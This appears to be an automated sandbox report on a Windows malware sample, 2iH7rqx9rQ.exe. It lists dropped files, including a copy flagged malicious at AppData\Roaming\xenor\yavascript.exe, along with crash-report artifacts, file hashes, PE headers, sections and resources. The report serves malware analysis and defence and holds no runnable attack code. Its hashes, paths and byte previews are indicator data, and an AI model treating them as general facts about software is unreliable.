Preview:	MDMP..a..... ........%.g........................P...............(1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T.......t...g..g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE51C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.7016506569303793
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+N6oE6YNQLSU98Zgmf5GpBn89b6gsfYt+m:R6lXJ86r6YuLSU98Zgmf5x6zfYN
MD5:	987638ADCDDDB46172F49988659AAB9B
SHA1:	1685452D8B8A19412D44AE56A0165BE0BA815919
SHA-256:	79D62EC8F94007D04606AB873DC96BD49E9A5414B9337842D1AE06627343FEE4
SHA-512:	A92E987BB581ED51E9C06812D2DA061C832816F7F541E22F95B8703B9D2432A5DCF5CFCAA4524CF6A40581E1F11563A00381385D9BF4826A72F278EFA588B005
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE54C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.485286975919091
Encrypted:	false
SSDEEP:	48:cvIwWl8zshJg77aI9OpiK3WpW8VYEYm8M4JxfFZo+q8whsBHepqfd:uIjfzI7yiT7VQJ9oJsBHepqfd
MD5:	608A78A2AF728D1E571AC5206DA8FDF4
SHA1:	BAD59F157E227DDE90FA58975A97F3AE4448B6E1
SHA-256:	95C3565CC47C888839E00AB81F9FE0B969BE48E89DEEE9C9F1797AF4E1AB1D04
SHA-512:	7F82B850E08A10542F5F5E365D7337D7837E96B18C1DBEF473C9A4C6C4937ABF3B54BA437086761AF98B6ECAAEFD4FDDC4C370F8BCF52B8C02B01D8635251D3C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670985" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE961.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 08:02:25 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	55908
Entropy (8bit):	2.0787177073871144
Encrypted:	false
SSDEEP:	192:PvbGXyXSDXznts7zY2OCgtgosnlUpYjm3v82rB7FlXAN3avCAAgCkfiw/MwUo7oP:7OPntsOxgFlrU7v3zNp/MVMq4
MD5:	0FFA72450FF8A02A7CAC9F7458725496
SHA1:	F23DF12C064CB54A93E6C9F280DB49299FBD3C1A
SHA-256:	2A828FC948C8960CB250693377E89D01D754C69246B6CA61432C1EA0304D79AD
SHA-512:	AC7F6450442015654832E326659C3C0B432455A5FEF63A3097443D03145F96E4CB761AE1A1D9A21087A3EEB7804E84162A7AB8D0A54B793DE1D1B70EE2A2C6D7
Malicious:	false
Preview:	MDMP..a..... ........%.g........................P...............(1..........T.......8...........T...............\...........L...........8...............................................................................eJ..............GenuineIntel............T.......t...g..g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9EE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.7031269634290744
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+gh6o/6YNQPSU9e9G4DgmfpaAjAJpBH89bDgsfRBm:R6lXJN6w6YuPSU9e9G4DgmfpaAjA+Dzu
MD5:	057450B01E0AEC58D08E2A7EB2CFFE20
SHA1:	6CF46D0C6F799AA8130289106E724F4CC0E88EF1
SHA-256:	F266D37094FEC5DF2FCB20CFDD1D94B0FEA048F9D2275173AABD5A73D591BAB5
SHA-512:	932B28562DD39713FF519C1C10DDB5C1D37812A426F1A71A1D412EA8F308D706EEFAD44B076D31BE7E5BD366E646D599B9C7B3E92663A3F1FD3964EC7705852A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA3D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.481260506754646
Encrypted:	false
SSDEEP:	48:cvIwWl8zshJg77aI9OpiK3WpW8VYAYm8M4Jx3F6u+q8IhsBHepqfd:uIjfzI7yiT7V0JGuZsBHepqfd
MD5:	D9737C5624173C7FBC9CADF28F3E6454
SHA1:	9E346651E3F069C69A8A6F3BAF15ADE2E3087BCE
SHA-256:	9F2E7141074CCBFC5E5803CEDE0079115E5949AC802691137A2CF475E8C22A3C
SHA-512:	0ACC541EE5B6D18255D770AE24ACC508D9193C025A83A1B580832CE48BCEFBD2226A5D8064A337C1B051952018B2467BB5768EE1EDABD073B64D10E8D5C1A9CA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670985" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF298.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 08:02:28 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	57002
Entropy (8bit):	2.076018185577463
Encrypted:	false
SSDEEP:	192:qpkXyXSDXzntswQHOCgtggWlD7Yj1q3v42+/gyHKavCAAVCkfiMjSJSfE0cl+6+:IQPntswQuxggEAngytzAXjSaulT+
MD5:	5D20BFD59D33634E4B1D9766028A02DE
SHA1:	3E048516FA70AF9E7094903AEA57089AFC1BB328
SHA-256:	A25EEAE72405C6B16D3753D5842E4859944B9BC6FAC8C3F96BE9EDD80239A13C
SHA-512:	99110E41886197ECF8C2FD989F6EECDA1E8F79395F5D921FA2B86F6BC5E3050F705B9C24273589B84999D2CFD3BB6713DC559B41399EFFEB2C74D606976E9DD0
Malicious:	false
Preview:	MDMP..a..... ........%.g........................P...........t...(1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T.......t...g..g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF393.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.700554086066944
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+Sb6o0ZG6YNQHSU95ggmf5GpBt89bmgsf79im:R6lXJX6c6YuHSU95ggmf5jmzf7p
MD5:	2353A26BFC9C9B98B3C6A235FCC28B72
SHA1:	8B60F8A5FE339E0C6EDB993F75C2B737CA8FB15C
SHA-256:	8A10C08DECD07B10395F5F818A9522A34C4CD1265E2AEF0E40FA4A4BCBBBFD87
SHA-512:	9DC7326F25C97B0311DD41AC52C25094BB74271995C6DAC831AB732245BD7BA0785E18D0C8F864FAB26844297538C7271EB1AD2A88A9F52E697E00B05549C4EA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3D2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.483109451261941
Encrypted:	false
SSDEEP:	48:cvIwWl8zshJg77aI9OpiK3WpW8VYVYm8M4JxfFK/+q8whsBHepqfd:uIjfzI7yiT7VlJEJsBHepqfd
MD5:	448DFAC1FFE414022BB4EFAEF48077CE
SHA1:	B78153ADE20B93E0FEA9E61036578D760F4A24EE
SHA-256:	23DDBC8F0971CA8854C9C57DA2610D26A557E316FB731F95EEB432CCD31B95AA
SHA-512:	3927BFE9D6AED2B486852891C772676977CC64C4E32B30905A92097448E7969F131ADE1FC336261D23E3846175A3F9B92BEBB68DC7FF7CB63A5A38C193C77C5B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670985" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\xenor\yavascript.exe

Download File

Process:	C:\Users\user\Desktop\2iH7rqx9rQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459264
Entropy (8bit):	7.0410755531666585
Encrypted:	false
SSDEEP:	12288:yg3o/PnH46JeFGv6m6cCRk6qdg52Kcaj:ytv4HsimURudg53
MD5:	73666F4D35944F20B34C150B8D9DF538
SHA1:	8548D775B3475704DFE36E30D3BF115D8964330C
SHA-256:	ED1416C90A49177106CBEA5B7551756E06FEE46D77FDE4879B8735EC56DD54B4
SHA-512:	C39FFD67E6418B5FBDC8AE595BC041C3B250E38F7D6CCB132104D592A3FD8CFA7A301DD4531E16DDB48D367977637A8D004DC2712416744EC5CC9E5E24B22433
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76% Antivirus: Virustotal, Detection: 57%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d.................P..."?..............`....@..........................pD......a.......................................x..P....PC..................................................... u.......t..@............`..t............................text...\O.......P.................. ..`.rdata... ...`..."...T..............@..@.data....`=......(...v..............@....tls.....C....C..D..................@....rsrc........PC.. ..................@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\xenor\yavascript.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\2iH7rqx9rQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4193659444261195
Encrypted:	false
SSDEEP:	6144:vcifpi6ceLPL9skLmb0mISWSPtaJG8nAgex285i2MMhA20X4WABlGuNp5+:Ui58ISWIZBk2MM6AFBLo
MD5:	3FC673CFE46445327F5E77D6DB4B8297
SHA1:	E21221E9957610C83AC85E11A9D502E246091BA0
SHA-256:	FA65EBB2FB28720983DB9582091A786E3E18E9A449C5CF4112DB42D859D2DAE5
SHA-512:	46454D2328993D90B750F9C6C65B3846C98785E56442D8DF10C48A1B36D8B1CD1321362CFF1115D753D368209B8ED78D6FFB3E11986D0A5E99F2D1B41D347524
Malicious:	false
Preview:	regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.3...c................................................................................................................................................................................................................................................................................................................................................./........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0410755531666585
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2iH7rqx9rQ.exe
File size:	459'264 bytes
MD5:	73666f4d35944f20b34c150b8d9df538
SHA1:	8548d775b3475704dfe36e30d3bf115d8964330c
SHA256:	ed1416c90a49177106cbea5b7551756e06fee46d77fde4879b8735ec56dd54b4
SHA512:	c39ffd67e6418b5fbdc8ae595bc041c3b250e38f7d6ccb132104d592a3fd8cfa7a301dd4531e16ddb48d367977637a8d004dc2712416744ec5cc9e5e24b22433
SSDEEP:	12288:yg3o/PnH46JeFGv6m6cCRk6qdg52Kcaj:ytv4HsimURudg53
TLSH:	16A4D091E5E08529FDF38B315974DAF4863BBD676A70828E3684F21F1A732D18A35703
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d.................P.

File Icon


Icon Hash:	8696e563b034c040

Static PE Info

General

Entrypoint:	0x401310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64B5FACF [Tue Jul 18 02:37:03 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5cb3cdf16a4cde668336bde4680c23df

Entrypoint Preview

Instruction
call 00007FF89948DDDBh
jmp 00007FF89948C0EDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0045B878h], eax
mov dword ptr [0045B874h], ecx
mov dword ptr [0045B870h], edx
mov dword ptr [0045B86Ch], ebx
mov dword ptr [0045B868h], esi
mov dword ptr [0045B864h], edi
mov word ptr [0045B890h], ss
mov word ptr [0045B884h], cs
mov word ptr [0045B860h], ds
mov word ptr [0045B85Ch], es
mov word ptr [0045B858h], fs
mov word ptr [0045B854h], gs
pushfd
pop dword ptr [0045B888h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045B87Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0045B880h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045B88Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0045B7C8h], 00010001h
mov eax, dword ptr [0045B880h]
mov dword ptr [0045B77Ch], eax
mov dword ptr [0045B770h], C0000409h
mov dword ptr [0045B774h], 00000001h
mov eax, dword ptr [00459004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00459008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x57814	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x435000	0x11ff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x57520	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x574d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x56000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x54f5c	0x55000	77cd814bbcc781071697a68473305256	False	0.8660587086397059	data	7.606690155614193	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x56000	0x20a0	0x2200	2b8dfbaa01a16027dd67a2eb6469304f	False	0.3591452205882353	data	5.450251491853335	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x59000	0x3d60dc	0x2800	4458e418de9dd64e0a16a42f8d259152	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x430000	0x439d	0x4400	57af5ba53aef63ff0feb609acb54e33b	False	0.002470128676470588	data	0.0008921252552643771	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x435000	0x11ff8	0x12000	aec3bc7f84bd97d07e4a88209d7d4959	False	0.4504665798611111	data	5.1358574352837065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x4401a8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x4402d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x4428a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x4356f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Syriac	Syriac	0.3648720682302772
RT_ICON	0x436598	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Syriac	Syriac	0.5063176895306859
RT_ICON	0x436e40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Syriac	Syriac	0.5881336405529954
RT_ICON	0x437508	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Syriac	Syriac	0.619942196531792
RT_ICON	0x437a70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Syriac	Syriac	0.3574108818011257
RT_ICON	0x438b18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Syriac	Syriac	0.3536885245901639
RT_ICON	0x4394a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Syriac	Syriac	0.40425531914893614
RT_ICON	0x439970	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Syriac	Syriac	0.6660447761194029
RT_ICON	0x43a818	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Syriac	Syriac	0.634927797833935
RT_ICON	0x43b0c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Syriac	Syriac	0.5339861751152074
RT_ICON	0x43b788	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Syriac	Syriac	0.6495664739884393
RT_ICON	0x43bcf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Syriac	Syriac	0.5984439834024896
RT_ICON	0x43e298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Syriac	Syriac	0.6310975609756098
RT_ICON	0x43f340	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Syriac	Syriac	0.6385245901639345
RT_ICON	0x43fcc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Syriac	Syriac	0.651595744680851
RT_DIALOG	0x443920	0x84	data			0.7651515151515151
RT_STRING	0x4439a8	0x4be	data			0.4341021416803954
RT_STRING	0x443e68	0xc4	data			0.5714285714285714
RT_STRING	0x443f30	0x732	data			0.4250814332247557
RT_STRING	0x444668	0x7bc	data			0.4212121212121212
RT_STRING	0x444e28	0x5f0	data			0.4421052631578947
RT_STRING	0x445418	0x696	data			0.431791221826809
RT_STRING	0x445ab0	0x7c0	data			0.4223790322580645
RT_STRING	0x446270	0x76a	data			0.422550052687039
RT_STRING	0x4469e0	0x614	data			0.4338046272493573
RT_GROUP_CURSOR	0x442880	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x443750	0x14	data			1.25
RT_GROUP_ICON	0x440130	0x76	data	Syriac	Syriac	0.6779661016949152
RT_GROUP_ICON	0x439908	0x68	data	Syriac	Syriac	0.7115384615384616
RT_VERSION	0x443768	0x1b8	COM executable for DOS			0.5704545454545454

Imports

DLL	Import
